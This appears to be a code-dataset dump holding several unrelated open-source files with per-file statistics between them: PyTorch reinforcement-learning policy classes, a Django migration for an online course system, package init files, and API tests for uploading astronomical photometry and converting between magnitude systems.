reparameterize=True,
deterministic=False,
return_log_prob=False,
return_entropy=False,
return_log_prob_of_mean=False,
):
"""
:param obs: Observation
:param deterministic: If True, do not sample
:param return_log_prob: If True, return a sample and its log probability
:param return_entropy: If True, return the true expected log
prob. Will not need to be differentiated through, so this can be a
number.
:param return_log_prob_of_mean: If True, return the true expected log
prob. Will not need to be differentiated through, so this can be a
number.
"""
h = obs
for i, fc in enumerate(self.fcs):
h = self.hidden_activation(fc(h))
preactivation = self.last_fc(h)
mean = self.output_activation(preactivation)
if self.std is None:
# log_std = self.last_fc_log_std(h)
# log_std = torch.clamp(log_std, LOG_SIG_MIN, LOG_SIG_MAX)
# log_std = torch.sigmoid(self.last_fc_log_std(h))
if self.std_architecture == "shared":
log_std = torch.sigmoid(self.last_fc_log_std(h))
elif self.std_architecture == "values":
log_std = torch.sigmoid(self.log_std_logits)
else:
error
log_std = self.min_log_std + log_std * (self.max_log_std - self.min_log_std)
std = torch.exp(log_std)
else:
std = torch.from_numpy(self.std)
log_std = self.log_std
weights = F.softmax(self.last_fc_weights(h)).reshape((-1, self.num_gaussians, 1))
mixture_means = mean.reshape((-1, self.action_dim, self.num_gaussians, ))
mixture_stds = std.reshape((-1, self.action_dim, self.num_gaussians, ))
dist = GaussianMixture(mixture_means, mixture_stds, weights)
# normal = Normal(mean, std)
# import ipdb; ipdb.set_trace()
mean = dist.mean()
log_prob = None
entropy = None
mean_action_log_prob = None
if deterministic:
action = mean
else:
# normal = Normal(mean, std)
if return_log_prob:
if reparameterize is True:
action = dist.rsample()
else:
action = dist.sample()
log_prob = dist.log_prob(action)
else:
if reparameterize is True:
action = dist.rsample()
else:
action = dist.sample()
if return_entropy:
entropy = log_std + 0.5 + np.log(2 * np.pi) / 2
# I'm not sure how to compute the (differential) entropy for a
# tanh(Gaussian)
entropy = entropy.sum(dim=1, keepdim=True)
raise NotImplementedError()
if return_log_prob_of_mean:
normal = Normal(mean, std)
mean_action_log_prob = normal.log_prob(mean)
mean_action_log_prob = mean_action_log_prob.sum(dim=1, keepdim=True)
return (
action, mean, log_std, log_prob, entropy, std,
mean_action_log_prob, None, dist,
)
class GaussianMixtureObsProcessorPolicy(GaussianMixturePolicy):
def __init__(self, obs_processor, *args, **kwargs):
super().__init__(*args, **kwargs)
self.obs_processor = obs_processor
def forward(self, obs, *args, **kwargs):
h_obs = self.obs_processor(obs)
return super().forward(h_obs, *args, **kwargs)
class TanhGaussianObsProcessorPolicy(TanhGaussianPolicy):
def __init__(self, obs_processor, *args, **kwargs):
super().__init__(*args, **kwargs)
self.pre_obs_dim = obs_processor.input_size
self.pre_goal_dim = obs_processor.input_size
self.obs_processor = obs_processor
def forward(self, obs, *args, **kwargs):
obs_and_goal = obs
assert obs_and_goal.shape[1] == self.pre_obs_dim + self.pre_goal_dim
obs = obs_and_goal[:, :self.pre_obs_dim]
goal = obs_and_goal[:, self.pre_obs_dim:]
h_obs = self.obs_processor(obs)
h_goal = self.obs_processor(goal)
flat_inputs = torch.cat((h_obs, h_goal), dim=1)
return super().forward(flat_inputs, *args, **kwargs)
# noinspection PyMethodOverriding
class TanhCNNGaussianPolicy(CNN, ExplorationPolicy):
"""
Usage:
```
policy = TanhGaussianPolicy(...)
action, mean, log_std, _ = policy(obs)
action, mean, log_std, _ = policy(obs, deterministic=True)
action, mean, log_std, log_prob = policy(obs, return_log_prob=True)
```
Here, mean and log_std are the mean and log_std of the Gaussian that is
sampled from.
If deterministic is True, action = tanh(mean).
If return_log_prob is False (default), log_prob = None
This is done because computing the log_prob can be a bit expensive.
"""
def __init__(
self,
std=None,
init_w=1e-3,
**kwargs
):
super().__init__(
init_w=init_w,
**kwargs
)
obs_dim = self.input_width * self.input_height
action_dim = self.output_size
self.log_std = None
self.std = std
if std is None:
last_hidden_size = obs_dim
if len(self.hidden_sizes) > 0:
last_hidden_size = self.hidden_sizes[-1]
self.last_fc_log_std = nn.Linear(last_hidden_size, action_dim)
self.last_fc_log_std.weight.data.uniform_(-init_w, init_w)
self.last_fc_log_std.bias.data.uniform_(-init_w, init_w)
else:
self.log_std = np.log(std)
assert LOG_SIG_MIN <= self.log_std <= LOG_SIG_MAX
def get_action(self, obs_np, deterministic=False):
actions = self.get_actions(obs_np[None], deterministic=deterministic)
return actions[0, :], {}
def get_actions(self, obs_np, deterministic=False):
return eval_np(self, obs_np, deterministic=deterministic)[0]
def forward(
self,
obs,
reparameterize=True,
deterministic=False,
return_log_prob=False,
return_entropy=False,
return_log_prob_of_mean=False,
):
"""
:param obs: Observation
:param deterministic: If True, do not sample
:param return_log_prob: If True, return a sample and its log probability
:param return_entropy: If True, return the true expected log
prob. Will not need to be differentiated through, so this can be a
number.
:param return_log_prob_of_mean: If True, return the true expected log
prob. Will not need to be differentiated through, so this can be a
number.
"""
h = super().forward(obs, return_last_activations=True)
mean = self.last_fc(h)
if self.std is None:
log_std = self.last_fc_log_std(h)
log_std = torch.clamp(log_std, LOG_SIG_MIN, LOG_SIG_MAX)
std = torch.exp(log_std)
else:
std = self.std
log_std = self.log_std
log_prob = None
entropy = None
mean_action_log_prob = None
pre_tanh_value = None
if deterministic:
action = torch.tanh(mean)
else:
tanh_normal = TanhNormal(mean, std)
if return_log_prob:
if reparameterize is True:
action, pre_tanh_value = tanh_normal.rsample(
return_pretanh_value=True
)
else:
action, pre_tanh_value = tanh_normal.sample(
return_pretanh_value=True
)
log_prob = tanh_normal.log_prob(
action,
pre_tanh_value=pre_tanh_value
)
log_prob = log_prob.sum(dim=1, keepdim=True)
else:
if reparameterize is True:
action = tanh_normal.rsample()
else:
action = tanh_normal.sample()
if return_entropy:
entropy = log_std + 0.5 + np.log(2 * np.pi) / 2
# I'm not sure how to compute the (differential) entropy for a
# tanh(Gaussian)
entropy = entropy.sum(dim=1, keepdim=True)
raise NotImplementedError()
if return_log_prob_of_mean:
tanh_normal = TanhNormal(mean, std)
mean_action_log_prob = tanh_normal.log_prob(
torch.tanh(mean),
pre_tanh_value=mean,
)
mean_action_log_prob = mean_action_log_prob.sum(dim=1, keepdim=True)
return (
action, mean, log_std, log_prob, entropy, std,
mean_action_log_prob, pre_tanh_value,
)
class VAEPolicy(Mlp, ExplorationPolicy):
def __init__(
self,
hidden_sizes,
obs_dim,
action_dim,
latent_dim,
std=None,
init_w=1e-3,
**kwargs
):
super().__init__(
hidden_sizes,
input_size=obs_dim,
output_size=action_dim,
init_w=init_w,
**kwargs
)
self.latent_dim = latent_dim
self.e1 = torch.nn.Linear(obs_dim + action_dim, 750)
self.e2 = torch.nn.Linear(750, 750)
self.mean = torch.nn.Linear(750, self.latent_dim)
self.log_std = torch.nn.Linear(750, self.latent_dim)
self.d1 = torch.nn.Linear(obs_dim + self.latent_dim, 750)
self.d2 = torch.nn.Linear(750, 750)
self.d3 = torch.nn.Linear(750, action_dim)
self.max_action = 1.0
self.latent_dim = latent_dim
def get_action(self, obs_np, deterministic=False):
actions = self.get_actions(obs_np[None], deterministic=deterministic)
return actions[0, :], {}
def get_actions(self, obs_np, deterministic=False):
return eval_np(self, obs_np, deterministic=deterministic,
execute_actions=True)[0]
def forward(self, state, action):
z = F.relu(self.e1(torch.cat([state, action], 1)))
z = F.relu(self.e2(z))
mean = self.mean(z)
# Clamped for numerical stability
log_std = self.log_std(z).clamp(-4, 15)
std = torch.exp(log_std)
z = mean + std * ptu.from_numpy(
np.random.normal(0, 1, size=(std.size())))
u = self.decode(state, z)
return u, mean, std
def decode(self, state, z=None):
if z is None:
z = ptu.from_numpy(np.random.normal(0, 1, size=(
state.size(0), self.latent_dim))).clamp(-0.5, 0.5)
a = F.relu(self.d1(torch.cat([state, z], 1)))
a = F.relu(self.d2(a))
return torch.tanh(self.d3(a))
def decode_multiple(self, state, z=None, num_decode=10):
if z is None:
z = ptu.from_numpy(np.random.normal(0, 1, size=(
state.size(0), num_decode, self.latent_dim))).clamp(-0.5, 0.5)
a = F.relu(self.d1(torch.cat(
[state.unsqueeze(0).repeat(num_decode, 1, 1).permute(1, 0, 2), z],
2)))
a = F.relu(self.d2(a))
return torch.tanh(self.d3(a)), self.d3(a)
class ConvVAEPolicy(GaussianLatentVAE, ExplorationPolicy):
"""Conv vae policy"""
def __init__(self, representation_size, architecture, action_dim,
encoder_class=CNN,
input_channels=1, imsize=48, init_w=1e-3, min_variance=1e-3,
hidden_init=ptu.fanin_init):
super().__init__(representation_size)
if min_variance is None:
self.log_min_variance = None
else:
self.log_min_variance = float(np.log(min_variance))
self.latent_dim = representation_size #FIXME(avi) Temp hack
self.input_channels = input_channels
self.imsize = imsize
self.imlength = self.imsize * self.imsize * self.input_channels
# deconv_args is also params for a convnet, since this policy is over a convnet
conv_args, deconv_args = architecture['conv_args'], \
architecture['deconv_args']
conv_output_size = deconv_args['deconv_input_width'] * \
deconv_args['deconv_input_height'] * \
deconv_args['deconv_input_channels']
# This is just for the image state encoder
self.encoder = encoder_class(
**conv_args,
output_size=conv_output_size,
init_w=init_w,
hidden_init=hidden_init,
)
# Now we encode the actions as well
self.action_encoder1 = torch.nn.Linear(
self.encoder.output_size + action_dim, 750)
self.action_encoder2 = torch.nn.Linear(750, representation_size)
self.action_std_encoder = torch.nn.Linear(750, representation_size)
self.action_std_decoder = torch.nn.Linear(representation_size, 750)
self.action_encoder1.weight.data.uniform_(-init_w, init_w)
self.action_encoder2.weight.data.uniform_(-init_w, init_w)
self.action_std_decoder.weight.data.uniform_(-init_w, init_w)
self.action_encoder1.bias.data.uniform_(-init_w, init_w)
self.action_encoder2.bias.data.uniform_(-init_w, init_w)
self.action_std_encoder.bias.data.uniform_(-init_w, init_w)
# conv net for the observation input in the VAE decoder
self.decoder = encoder_class(
**conv_args,
output_size=conv_output_size,
init_w=init_w,
hidden_init=hidden_init,
)
# For finally decoding the action
self.action_decoder1 = torch.nn.Linear(
self.decoder.output_size + representation_size, 750)
self.action_decoder2 = torch.nn.Linear(750, 750)
self.action_decoder3 = torch.nn.Linear(750, action_dim)
self.representation_size = representation_size
self.action_dim = action_dim
def get_action(self, obs_np, deterministic=False):
actions = self.get_actions(obs_np[None], deterministic=deterministic)
return actions[0, :], {}
def get_actions(self, obs_np, deterministic=False):
return eval_np(self, obs_np, deterministic=deterministic,
execute_actions=True)[0]
def encode(self, input_obs, action):
h = F.relu(self.encoder(input_obs))
h_cat_action = torch.cat([h, action], dim=-1)
x = F.relu(self.action_encoder1(h_cat_action))
mu = self.action_encoder2(x)
log_std = self.action_std_encoder(x)
if self.log_min_variance is None:
log_std = log_std
else:
log_std = self.log_min_variance + log_std
return (mu, log_std)
def decode(self, state, z=None):
if z is None:
z = ptu.from_numpy(np.random.normal(0, 1, size=(
state.size(0), self.latent_dim))).clamp(-0.5, 0.5)
h = F.relu(self.decoder(state))
a = F.relu(self.action_decoder1(torch.cat([h, z], 1)))
a = F.relu(self.action_decoder2(a))
return torch.tanh(self.action_decoder3(a))
def forward(self, state, action):
mean, log_std = self.encode(state, action)
# Clamped for numerical stability
log_std = log_std.clamp(-4, 15)
std = torch.exp(log_std)
z = mean + std * ptu.from_numpy(
np.random.normal(0, 1, size=(std.size())))
u = self.decode(state, z)
return u, mean, std
def decode_multiple(self, state, z=None, num_decode=10):
if z is None:
z = ptu.from_numpy(np.random.normal(0, 1, size=(
state.size(0), num_decode, self.latent_dim))).clamp(-0.5, 0.5)
h = F.relu(self.decoder(state))
a = F.relu(self.action_decoder1(torch.cat(
[h.unsqueeze(0).repeat(num_decode, 1, 1).permute(1, 0, 2), z], 2)))
a = F.relu(self.action_decoder2(a))
return torch.tanh(self.action_decoder3(a)), self.action_decoder3(a)
def logprob(self, inputs, obs_distribution_params):
return None
class MakeDeterministic(Policy, ):
def __init__(self, stochastic_policy):
self.stochastic_policy = stochastic_policy
def get_action(self, *args, deterministic=False, **kwargs):
return self.stochastic_policy.get_action(
*args, deterministic=True, **kwargs
)
def to(self, device):
self.stochastic_policy.to(device)
def load_state_dict(self, stochastic_state_dict):
self.stochastic_policy.load_state_dict(stochastic_state_dict)
def state_dict(self):
return self.stochastic_policy.state_dict()
| 36.096033
| 109
| 0.586177
| 4,388
| 34,580
| 4.34845
| 0.059253
| 0.045281
| 0.025208
| 0.022273
| 0.824013
| 0.794193
| 0.775693
| 0.763377
| 0.755726
| 0.737802
| 0
| 0.010691
| 0.323742
| 34,580
| 957
| 110
| 36.133751
| 0.80526
| 0.125477
| 0
| 0.751734
| 0
| 0
| 0.004659
| 0.000709
| 0
| 0
| 0
| 0.001045
| 0.006935
| 1
| 0.066574
| false
| 0
| 0.01387
| 0.01387
| 0.144244
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
825ee8dee2685e1a1d26a3256617cc93b2781f35
| 44
|
py
|
Python
|
tensortrade/env/__init__.py
|
nicomon24/tensortrade
|
870ae06a4440045edde4f5306e64264bd33d5b67
|
[
"Apache-2.0"
] | 3,081
|
2020-01-12T13:42:13.000Z
|
2022-03-27T18:09:31.000Z
|
tensortrade/env/__init__.py
|
nicomon24/tensortrade
|
870ae06a4440045edde4f5306e64264bd33d5b67
|
[
"Apache-2.0"
] | 257
|
2020-01-15T03:14:29.000Z
|
2022-03-31T04:19:14.000Z
|
tensortrade/env/__init__.py
|
nicomon24/tensortrade
|
870ae06a4440045edde4f5306e64264bd33d5b67
|
[
"Apache-2.0"
] | 804
|
2020-01-12T12:22:22.000Z
|
2022-03-28T13:41:59.000Z
|
from . import generic
from . import default
| 14.666667
| 21
| 0.772727
| 6
| 44
| 5.666667
| 0.666667
| 0.588235
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.181818
| 44
| 2
| 22
| 22
| 0.944444
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
8288872c00211c25184a0d8503e218e8fb7cf803
| 10,831
|
py
|
Python
|
FusionIIIT/applications/online_cms/migrations/0001_initial.py
|
ssaksham9/Fusion
|
f1e405b457dba399411a2ddb79a9068746c05057
|
[
"bzip2-1.0.6"
] | 2
|
2020-01-24T16:34:54.000Z
|
2020-08-01T05:09:24.000Z
|
FusionIIIT/applications/online_cms/migrations/0001_initial.py
|
ssaksham9/Fusion
|
f1e405b457dba399411a2ddb79a9068746c05057
|
[
"bzip2-1.0.6"
] | 19
|
2019-09-08T06:01:14.000Z
|
2020-05-21T09:08:20.000Z
|
FusionIIIT/applications/online_cms/migrations/0001_initial.py
|
ssaksham9/Fusion
|
f1e405b457dba399411a2ddb79a9068746c05057
|
[
"bzip2-1.0.6"
] | 14
|
2019-08-31T12:25:42.000Z
|
2022-01-12T08:05:33.000Z
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.25 on 2019-10-31 23:56
from __future__ import unicode_literals
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('globals', '0003_auto_20191024_1242'),
('academic_information', '0001_initial'),
]
operations = [
migrations.CreateModel(
name='Assignment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('upload_time', models.DateTimeField(auto_now=True)),
('submit_date', models.DateTimeField()),
('assignment_name', models.CharField(max_length=100)),
('assignment_url', models.CharField(max_length=100, null=True)),
('course_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='academic_information.Course')),
],
),
migrations.CreateModel(
name='CourseDocuments',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('upload_time', models.DateTimeField(auto_now=True)),
('description', models.CharField(max_length=100)),
('document_name', models.CharField(max_length=40)),
('document_url', models.CharField(max_length=100, null=True)),
('course_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='academic_information.Course')),
],
),
migrations.CreateModel(
name='CourseVideo',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('upload_time', models.DateTimeField(auto_now=True)),
('description', models.CharField(max_length=100)),
('video_name', models.CharField(max_length=40)),
('video_url', models.CharField(max_length=100, null=True)),
('course_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='academic_information.Course')),
],
),
migrations.CreateModel(
name='Forum',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('comment_time', models.DateTimeField(auto_now=True)),
('comment', models.TextField(max_length=2000)),
('commenter_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='globals.ExtraInfo')),
('course_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='academic_information.Course')),
],
),
migrations.CreateModel(
name='ForumReply',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('forum_ques', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='forum_ques', to='online_cms.Forum')),
('forum_reply', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='forum_reply', to='online_cms.Forum')),
],
),
migrations.CreateModel(
name='Practice',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('prac_quiz_name', models.CharField(max_length=20)),
('negative_marks', models.FloatField(default=0)),
('number_of_question', models.IntegerField(default=0)),
('description', models.TextField(max_length=1000)),
('total_score', models.IntegerField(default=0)),
('course_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='academic_information.Course')),
],
),
migrations.CreateModel(
name='PracticeQuestion',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('question', models.TextField(max_length=1000)),
('options1', models.CharField(max_length=100, null=True)),
('options2', models.CharField(max_length=100, null=True)),
('options3', models.CharField(max_length=100, null=True)),
('options4', models.CharField(max_length=100, null=True)),
('options5', models.CharField(max_length=100, null=True)),
('answer', models.IntegerField()),
('image', models.TextField(max_length=1000, null=True)),
('prac_quiz_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='online_cms.Practice')),
],
),
migrations.CreateModel(
name='Question',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('question', models.TextField(max_length=1000)),
('options1', models.CharField(max_length=100, null=True)),
('options2', models.CharField(max_length=100, null=True)),
('options3', models.CharField(max_length=100, null=True)),
('options4', models.CharField(max_length=100, null=True)),
('options5', models.CharField(max_length=100, null=True)),
('answer', models.IntegerField()),
('image', models.TextField(max_length=1000, null=True)),
('marks', models.IntegerField()),
],
),
migrations.CreateModel(
name='QuestionBank',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('name', models.CharField(max_length=100)),
('course_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='academic_information.Course')),
('instructor_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='globals.ExtraInfo')),
],
),
migrations.CreateModel(
name='Quiz',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('quiz_name', models.CharField(max_length=20)),
('end_time', models.DateTimeField()),
('start_time', models.DateTimeField()),
('d_day', models.CharField(max_length=2)),
('d_hour', models.CharField(max_length=2)),
('d_minute', models.CharField(max_length=2)),
('negative_marks', models.FloatField(default=0)),
('number_of_question', models.IntegerField(default=0)),
('description', models.TextField(max_length=1000)),
('rules', models.TextField(max_length=2000)),
('total_score', models.IntegerField(default=0)),
('course_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='academic_information.Course')),
],
),
migrations.CreateModel(
name='QuizQuestion',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('question', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='online_cms.Question')),
('quiz_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='online_cms.Quiz')),
],
),
migrations.CreateModel(
name='QuizResult',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('score', models.IntegerField()),
('finished', models.BooleanField(default=False)),
('quiz_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='online_cms.Quiz')),
('student_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='academic_information.Student')),
],
),
migrations.CreateModel(
name='StudentAnswer',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('choice', models.IntegerField()),
('question_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='online_cms.QuizQuestion')),
('quiz_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='online_cms.Quiz')),
('student_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='academic_information.Student')),
],
),
migrations.CreateModel(
name='StudentAssignment',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('upload_time', models.DateTimeField(auto_now=True)),
('upload_url', models.TextField(max_length=200)),
('score', models.IntegerField(null=True)),
('feedback', models.CharField(max_length=100, null=True)),
('assign_name', models.CharField(max_length=100)),
('assignment_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='online_cms.Assignment')),
('student_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='academic_information.Student')),
],
),
migrations.CreateModel(
name='Topics',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('topic_name', models.TextField(max_length=200)),
('course_id', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='academic_information.Course')),
],
),
migrations.AddField(
model_name='question',
name='question_bank',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='online_cms.QuestionBank'),
),
migrations.AddField(
model_name='question',
name='topic',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='online_cms.Topics'),
),
]
| 54.427136
| 147
| 0.593574
| 1,085
| 10,831
| 5.739171
| 0.125346
| 0.052031
| 0.075157
| 0.100209
| 0.829774
| 0.808094
| 0.768749
| 0.73904
| 0.73904
| 0.73904
| 0
| 0.02
| 0.261379
| 10,831
| 198
| 148
| 54.70202
| 0.758375
| 0.006371
| 0
| 0.657895
| 1
| 0
| 0.149828
| 0.036249
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.015789
| 0
| 0.036842
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
82a3e590dc05e9268ca8fb9e62db09304e4be169
| 179
|
py
|
Python
|
fargatespawner/__init__.py
|
dadoeyad/fargatespawner
|
df13e7ce003e79658379254909e24f81f6437225
|
[
"MIT"
] | null | null | null |
fargatespawner/__init__.py
|
dadoeyad/fargatespawner
|
df13e7ce003e79658379254909e24f81f6437225
|
[
"MIT"
] | null | null | null |
fargatespawner/__init__.py
|
dadoeyad/fargatespawner
|
df13e7ce003e79658379254909e24f81f6437225
|
[
"MIT"
] | null | null | null |
from .fargatespawner import FargateSpawner
from .fargatespawner import FargateSpawnerSecretAccessKeyAuthentication
from .fargatespawner import FargateSpawnerECSRoleAuthentication
| 44.75
| 71
| 0.916201
| 12
| 179
| 13.666667
| 0.416667
| 0.329268
| 0.439024
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.067039
| 179
| 3
| 72
| 59.666667
| 0.982036
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 1
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
82b49177427c56d783ac1e21e0865848bba9827a
| 22,058
|
py
|
Python
|
skyportal/tests/api/test_photometry.py
|
jialin-wu-02/skyportal
|
29d606ad8567b2230fb0553b18dd3cb9d3ab2d84
|
[
"BSD-3-Clause"
] | null | null | null |
skyportal/tests/api/test_photometry.py
|
jialin-wu-02/skyportal
|
29d606ad8567b2230fb0553b18dd3cb9d3ab2d84
|
[
"BSD-3-Clause"
] | 156
|
2019-10-17T19:35:22.000Z
|
2021-08-01T13:23:47.000Z
|
skyportal/tests/api/test_photometry.py
|
jialin-wu-02/skyportal
|
29d606ad8567b2230fb0553b18dd3cb9d3ab2d84
|
[
"BSD-3-Clause"
] | null | null | null |
import os
import datetime
import base64
from skyportal.tests import api
from skyportal.models import Thumbnail, DBSession, Photometry
import numpy as np
import sncosmo
def test_token_user_post_get_photometry_data(upload_data_token, public_source,
ztf_camera):
status, data = api('POST', 'photometry',
data={'obj_id': str(public_source.id),
'mjd': 58000.,
'instrument_id': ztf_camera.id,
'flux': 12.24,
'fluxerr': 0.031,
'zp': 25.,
'magsys': 'ab',
'filter': 'ztfg'
},
token=upload_data_token)
assert status == 200
assert data['status'] == 'success'
photometry_id = data['data']['ids'][0]
status, data = api(
'GET',
f'photometry/{photometry_id}?format=flux',
token=upload_data_token)
assert status == 200
assert data['status'] == 'success'
assert data['data']['ra'] is None
assert data['data']['dec'] is None
assert data['data']['ra_unc'] is None
assert data['data']['dec_unc'] is None
np.testing.assert_allclose(data['data']['flux'],
12.24 * 10**(-0.4 * (25. - 23.9)))
def test_token_user_post_mag_photometry_data_and_convert(upload_data_token,
public_source,
ztf_camera):
status, data = api('POST', 'photometry',
data={'obj_id': str(public_source.id),
'mjd': 58000.,
'instrument_id': ztf_camera.id,
'mag': 21.,
'magerr': 0.2,
'limiting_mag': 22.3,
'magsys': 'vega',
'filter': 'ztfg'
},
token=upload_data_token)
assert status == 200
assert data['status'] == 'success'
photometry_id = data['data']['ids'][0]
status, data = api(
'GET',
f'photometry/{photometry_id}?format=flux',
token=upload_data_token)
assert status == 200
assert data['status'] == 'success'
ab = sncosmo.get_magsystem('ab')
vega = sncosmo.get_magsystem('vega')
correction = 2.5 * np.log10(vega.zpbandflux('ztfg') / ab.zpbandflux('ztfg'))
np.testing.assert_allclose(data['data']['flux'],
10**(-0.4 * (21. - correction - 23.9 )))
np.testing.assert_allclose(data['data']['fluxerr'],
0.2 / (2.5 / np.log(10)) * data['data']['flux'])
status, data = api(
'GET',
f'photometry/{photometry_id}',
token=upload_data_token)
assert status == 200
assert data['status'] == 'success'
np.testing.assert_allclose(data['data']['mag'],
21. - correction)
np.testing.assert_allclose(data['data']['magerr'],
0.2)
def test_token_user_post_and_get_different_systems_mag(upload_data_token,
public_source,
ztf_camera):
status, data = api('POST', 'photometry',
data={'obj_id': str(public_source.id),
'mjd': 58000.,
'instrument_id': ztf_camera.id,
'mag': 21.,
'magerr': 0.2,
'limiting_mag': 22.3,
'magsys': 'vega',
'filter': 'ztfg'
},
token=upload_data_token)
assert status == 200
assert data['status'] == 'success'
photometry_id = data['data']['ids'][0]
status, data = api(
'GET',
f'photometry/{photometry_id}?format=mag&magsys=vega',
token=upload_data_token)
assert status == 200
assert data['status'] == 'success'
ab = sncosmo.get_magsystem('ab')
vega = sncosmo.get_magsystem('vega')
correction = 2.5 * np.log10(vega.zpbandflux('ztfg') / ab.zpbandflux('ztfg'))
np.testing.assert_allclose(data['data']['mag'], 21.)
np.testing.assert_allclose(data['data']['magerr'], 0.2)
np.testing.assert_allclose(data['data']['limiting_mag'], 22.3)
status, data = api(
'GET',
f'photometry/{photometry_id}?format=mag&magsys=ab',
token=upload_data_token)
assert status == 200
assert data['status'] == 'success'
np.testing.assert_allclose(data['data']['mag'], 21. - correction)
np.testing.assert_allclose(data['data']['magerr'], 0.2)
np.testing.assert_allclose(data['data']['limiting_mag'], 22.3 - correction)
def test_token_user_post_and_get_different_systems_flux(upload_data_token,
public_source,
ztf_camera):
status, data = api('POST', 'photometry',
data={'obj_id': str(public_source.id),
'mjd': 58000.,
'instrument_id': ztf_camera.id,
'mag': 21.,
'magerr': 0.2,
'limiting_mag': 22.3,
'magsys': 'vega',
'filter': 'ztfg'
},
token=upload_data_token)
assert status == 200
assert data['status'] == 'success'
photometry_id = data['data']['ids'][0]
status, data = api(
'GET',
f'photometry/{photometry_id}?format=flux&magsys=vega',
token=upload_data_token)
assert status == 200
assert data['status'] == 'success'
ab = sncosmo.get_magsystem('ab')
vega = sncosmo.get_magsystem('vega')
correction = 2.5 * np.log10(vega.zpbandflux('ztfg') / ab.zpbandflux('ztfg'))
np.testing.assert_allclose(data['data']['flux'], 10**(-0.4 * (21 - correction - 23.9)))
np.testing.assert_allclose(data['data']['fluxerr'], 0.2 / (2.5 / np.log(10)) * data['data']['flux'])
np.testing.assert_allclose(data['data']['zp'], 23.9 + correction)
status, data = api(
'GET',
f'photometry/{photometry_id}?format=flux&magsys=ab',
token=upload_data_token)
assert status == 200
assert data['status'] == 'success'
np.testing.assert_allclose(data['data']['flux'], 10**(-0.4 * (21 - correction - 23.9)))
